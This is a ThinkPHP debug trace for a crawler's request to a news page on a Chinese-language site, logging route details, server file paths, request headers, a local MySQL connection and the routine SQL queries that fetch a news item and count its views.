/index/news/xwxq/id/139.html [ info ] xn--vhqsn14am88k.com/index/news/xwxq/id/139.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,198.42kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)', 'connection' => 'close', 'accept-encoding' => 'gzip,deflate', 'accept' => 'text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml, application/xhtml+xml', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/139_html' => '', 'id' => '139', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 139 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 139 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ]